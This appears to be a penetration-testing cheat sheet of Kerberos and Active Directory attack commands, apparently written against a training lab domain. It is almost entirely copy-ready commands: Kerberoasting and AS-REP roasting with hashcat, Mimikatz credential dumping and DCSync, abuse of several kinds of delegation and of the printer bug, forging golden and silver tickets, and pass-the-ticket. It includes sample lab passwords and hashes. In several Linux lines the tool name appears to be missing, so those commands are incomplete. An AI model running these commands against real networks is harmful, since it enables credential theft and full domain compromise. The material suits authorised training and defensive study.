Kerberos Attacks

From Linux


# Request 1 Ticket -dc-ip <ip> <domain/<user> -request-user <username>

# Request All Tickets -dc-ip <ip> <domain/<user --request

# Save to Output -dc-ip <ip> INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs

# Crack TGS Ticket
hashcat -m 13100 file.tgs $ROCKYOU

From Windows


# Find Accounts with SPN
setspn.exe -Q */*

# Better Command
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }


# Enable Base64 Output
base64 /out:true

# Export Tickets
kerberos::list /export  

# Modify To Better Format
echo "<base64 blob>" |  tr -d \\n 

# Output To John Format
cat encoded_file | base64 -d > sqldev.kirbi

# Make to John Format
python2.7 sqldev.kirbi

# HashCat Way, Modify to hashcat format
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' 


# Import Module
Import-Module .\PowerView.ps1

# List Users With SPN
Get-DomainUser * -spn | select samaccountname

# Target Single User + Hashcat Output
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat


# /Stats
.\Rubeus.exe kerberoast /stats

# List Admin Privileges Users for Kerberoasting
 .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

Double Hop Workarounds

Method 1: PSCredential Object

# Set password
$SecPassword = ConvertTo-SecureString '0xF0rk123!' -AsPlainText -Force

# Set Proper Login
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)

# Use Command with Credentials
get-domainuser -spn -credential $Cred | select samaccountname

Method 2: Register PSSession Configuration

# Check HTTP Ticket Present

# Configure PSSession
Register-PSSessionConfiguration -Name backupadmsess -RunAsCredential inlanefreight\backupadm

# Connect 
Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -ConfigurationName  backupadmsess

Roasting Attacks

AS-REPRoasting (Windows)

AS-REP Roasting Enumeration

# PowerView: Discover Account with Pre-Authentication Disbaled
Get-DomainUser -UACFilter DONT_REQ_PREAUTH | select samaccountname,useraccountcontrol

# Rubeus: Enumerate all user Accounts for Pre-Authentication
Rubeus.exe asreproast /format:hashcat

Performing AS-REPRoasting

# Rubeus
 .\Rubeus.exe asreproast /user:jenna.smith /domain:inlanefreight.local /dc:dc01.inlanefreight.local /nowrap /outfile:hashes.txt

# Crack the Hash
hashcat.exe -m 18200 hashes $ROCKYOU


Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose

AS-REPRoasting (LInux)

AS-REPRoasting Users Enumeration inlanefreight.local/pixis -request  

Find Accounts Without Authentication INLANEFREIGHT/ -dc-ip -usersfile /tmp/users.txt -format hashcat -no-pass

Kerberoasting (Windows)

Manual Detection (PowerShell Script)

$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.filter = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$results = $search.Findall()
foreach($result in $results)
    $userEntry = $result.GetDirectoryEntry()
    Write-host "User" 
    Write-Host "===="
    Write-Host $ "(" $userEntry.distinguishedName ")"
        Write-host ""
    Write-host "SPNs"
    Write-Host "===="     
    foreach($SPN in $userEntry.servicePrincipalName)
    Write-host ""
    Write-host ""

# Run Script

Find Accounts with SPN (PowerView)

# Find Accounts
Get-DomanUser -SPN | select samaccountname, serviceprincipalname,memberof

Invoke Kerberoasting (PowerView)


Rubeus Kerberoasting

Rubeus.exe kerberoast /nowrap

Kerberoasting Without Account Password

In order to perform this attack, we need the following:

  1. Username of an account with pre-authentication.

  2. A target SPN.

Rubeus.exe kerberoast /nopreauth:amber.smith /domain:inlanefreight.local /spn:MSSQLSvc/SQL01:1433 /nowrap

Kerberoasting (Linux)

Get Account SPN inlanefreight.local/pixis -request

Unconstrained Delegation

Unconstrained Delegation - Computer

Method 1 (Waiting Authentication)

1 Monitor Stored Tickets (Rubeus)

.\Rubeus.exe monitor /interval:5 /nowrap

2 Using Captured Ticket to Request Another Ticket

.\Rubeus.exe asktgs /ticket:<base64> /service:cifs/dc01.INLANEFREIGHT.local /ptt

3 Using Newly ticket

dir \\dc01.inlanefreight.local\c$

Method 2 (Printer Bug)

1 Monitor Tickets

.\Rubeus.exe monitor /interval:5 /nowrap

2 Abusing Printer Bug

 .\SpoolSample.exe dc01.inlanefreight.local sql01.inlanefreight.local

3 Captare & Renew Ticket

# Once Intercepted, we need to renew the ticket
.\Rubeus.exe renew /ticket:<base64> /ptt

4 DcSync

# Since we haveTicket from dc01 and can dump all the hashes

5 Using NT Hash

# With DCSync, we are able to get all the hashes, we use the administrator hash to askTGT
.\Rubeus.exe asktgt /rc4:<NT-Hash> /user:<user> /ptt

# Perform Actions on DC01
dir \\dc01.inlanefreight.local\c$

Unconstrained Delegation - Users

Gather Unconstrained Delegation Users (Powerview)

Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" | select samaccountname, useraccountcontrol

1 Create Fake DNS Record

# Host DNS Server
python -u INLANEFREIGHT.LOCAL\\pixis -p p4ssw0rd -r roguecomputer.INLANEFREIGHT.LOCAL -d --action add

2 Verify DNS

nslookup roguecomputer.inlanefreight.local dc01.inlanefreight.local

3 Craft SPN

python -u inlanefreight.local\\pixis -p p4ssw0rd --target-type samname -t sqldev -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local

4 Decrypt Ticket

sudo python -hashes :cf3a5525ee9414229e66279623ed5c58

5 Leveraging Printer Bug

python3 inlanefreight.local/carole.rose:jasmine@ fakepcs.inlanefreight.local

6 Perform Attack

sudo python -hashes :cf3a5525ee9414229e66279623ed5c58

7 Export ccache + Secrets Dump

export KRB5CCNAME=<ccache> -k -no-pass dc01.inlanefreight.local

Constrained Delegation

Constrained Delegation (Windows)

Gather Constrained Delegation Computers

Get-DomainCoputer -TrustedAuth | select serviceprincipalname,dnshostname,useraccountcontrol

1 Get Machine Hash (Mimikatz)

.\mimikatz.exe privilege::debug sekurlsa::msv exit

2 Constrained Delegation Attack

# Need Machine Hash as rc4
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:www/WS01.inlanefreight.local /altservice:HTTP /user:DMZ01$ /rc4:ff955e93a130f5bb1a6565f32b7dc127 /ptt

# Verify Ticket

# Enter Session
Enter-PSSession ws01.inlanefreight.local

Constrained Delegation (Linux)

1 Find Delegation Accounts INLANEFREIGHT.LOCAL/carole.rose:jasmine

2 Craft Valid TGS Ticket -spn SERVER01 'INLANEFREIGHT.LOCAL/daniel.whitehead:dolphin' -impersonate Administrator

3 Login With TGS Ticket

# Export ccache
export KRB5CCNAME=<ccache>

# Login -k -no-pass INLANEFREIGHT.LOCAL/administrator@DC01 -debug

Resource Based Delegation (Windows)

Enumerate RBCD Script

# import the PowerView module
Import-Module C:\Tools\PowerView.ps1

# get all computers in the domain
$computers = Get-DomainComputer

# get all users in the domain
$users = Get-DomainUser

# define the required access rights
$accessRights = "GenericWrite","GenericAll","WriteProperty","WriteDacl"

# loop through each computer in the domain
foreach ($computer in $computers) {
    # get the security descriptor for the computer
    $acl = Get-ObjectAcl -SamAccountName $computer.SamAccountName -ResolveGUIDs

    # loop through each user in the domain
    foreach ($user in $users) {
        # check if the user has the required access rights on the computer object
        $hasAccess = $acl | ?{$_.SecurityIdentifier -eq $user.ObjectSID} | %{($_.ActiveDirectoryRights -match ($accessRights -join '|'))}

        if ($hasAccess) {
            Write-Output "$($user.SamAccountName) has the required access rights on $($computer.Name)"

1 Create Fake Computer

# Import PowerMad
Import-Module .\Powermad.ps1

# Add New Computer
New-MachineAccount -MachineAccount HACKTHEBOX -Password $(ConvertTo-SecureString "Hackthebox123+!" -AsPlainText -Force)

2 Modify Attributes Created Computer

  1. Obtain Computer SID.

  2. Use SDDL to create a security descriptor

  3. Set msDS-AllowedToActOnBehalfOfOtherIdentity in raw binary format.

  4. Modify the target computer.

# Import PowerView
Import-Module .\PowerView.ps1

# Step 1
$ComputerSid = Get-DomainComputer HACKTHEBOX -Properties objectsid | Select -Expand objectsid

# Step 2
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"

$SDBytes = New-Object byte[] ($SD.BinaryLength)

$SD.GetBinaryForm($SDBytes, 0)

# Step 3
$credentials = New-Object System.Management.Automation.PSCredential "INLANEFREIGHT\carole.holmes", (ConvertTo-SecureString "Y3t4n0th3rP4ssw0rd" -AsPlainText -Force)

# Step 4
Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Credential $credentials -Verbose

3 Get Computer Hash

.\Rubeus.exe hash /password:Hackthebox123+! /user:HACKTHEBOX$ /domain:inlanefreight.local

4 Request TGS Ticket

# /altservice:host,RPCSS,wsman,http,ldap,krbtgt,winrm
.\Rubeus.exe s4u /user:HACKTHEBOX$ /rc4:CF767C9A9C529361F108AA67BF1B3695 /impersonateuser:administrator /msdsspn:cifs/dc01.inlanefreight.local /ptt

# Connect to DC
ls \\dc01.inlanefreight.local\c$

Resource Based Delegation (Linux)

1 Create a New Computer -computer-name 'HACKTHEBOX$' -computer-pass Hackthebox123+\! -dc-ip inlanefreight.local/carole.holmes:'Y3t4n0th3rP4ssw0rd'

2 Add Computer to Trusted List

 python3 -dc-ip -t DC01 -f HACKTHEBOX 'inlanefreight.local/annette.jackson:horses'

3 Request TGS Ticket -spn cifs/DC01.inlanefreight.local -impersonate Administrator -dc-ip inlanefreight.local/HACKTHEBOX:Hackthebox123+\!

4 Export ccache & Login

# Export ccache
export KRB5CCNAME=<ccache>

# psexec -k -no-pass dc01.inlanefreight.local

Ticket Abuse

Golden Ticket (Windows)

We need 4 elements in order to perform a Golden Ticket attack.

  1. Domain Name

  2. Domain SID

  3. KRBTGT's Hash

  4. Username to impersonate

1 Gather Domain Name


2 Gather Domain SID


3 Gather krbtgt Hash

.\mimikatz.exe privilege::debug "lsadump::dcsync /user:krbtgt /domain:inlanefreight.local" exit

4 Forge Golden Ticket

.\mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:c0231bd8a4a4de92fca0760c0ba9e7a6 /ptt" "exit"

5 Login

Enter-PSSession dc01

Golden Ticket (Linux)

1 Gather Domain (SID) inlanefreight.local/pixis@dc01.inlanefreight.local -domain-sids

2 Create Golden Ticket -nthash c0231bd8a4a4de92fca0760c0ba9e7a6 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local Administrator

3 Importing and Use Ticket

export KRB5CCNAME=<ccache>

# Login -k -no-pass dc01.inlanefreight.local

Silver Ticket (Windows)

1 Gather Domain SID


2 Compromised Service Account

Without this account, a silver ticket is not possible

3 Forge Silver Ticket

.\mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:027c6604526b7b16a22e320b76e54a5b /target:sql01.inlanefreight.local /service:cifs  /ptt" "exit"

Create Sacrificial Process

# Create Process
Rubeus.exe createnetonly /program:cmd.exe /show

# Import Silver Ticket
Rubeus.exe ptt /ticket:sql01.kirbi

# Login
PSExec.exe -accepteula \\sql01.inlanefreight.local cmd

Silver Ticket (Linux)

1 Retrieve Domain SID inlanefreight.local/pixis@dc01.inlanefreight.local -domain-sids

2 Create Silver Ticket -nthash 542780725df68d3456a0672f59001987 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local -spn cifs/sql01.inlanefreight.local Administrator

3 Export ccache

export KRB5CCNAME=<ccache>

# Login -k -no-pass sql01.inlanefreight.local

Pass The Ticket

Pass-the-Ticket takes the user's Ticket Granting Ticket (TGT) or Ticket Granting Service (TGS) Ticket. The TGT is a signed ticket that contains a list of privilege levels. This TGT is passed to the Domain Controller, which will grant the TGS Ticket that can be used to access machines. Stealing either of these tickets makes it possible to perform lateral movement.

1 Create Sacrificial Process

.\Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show

2 Read Tickets

.\rubeus.exe triage

3 Extract Ticket With Rubeus

.\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap

4 Renew Ticket

Rubeus.exe renew /ticket:<base64> /ptt

4 Read Files

dir \\dc01\\c$

Last updated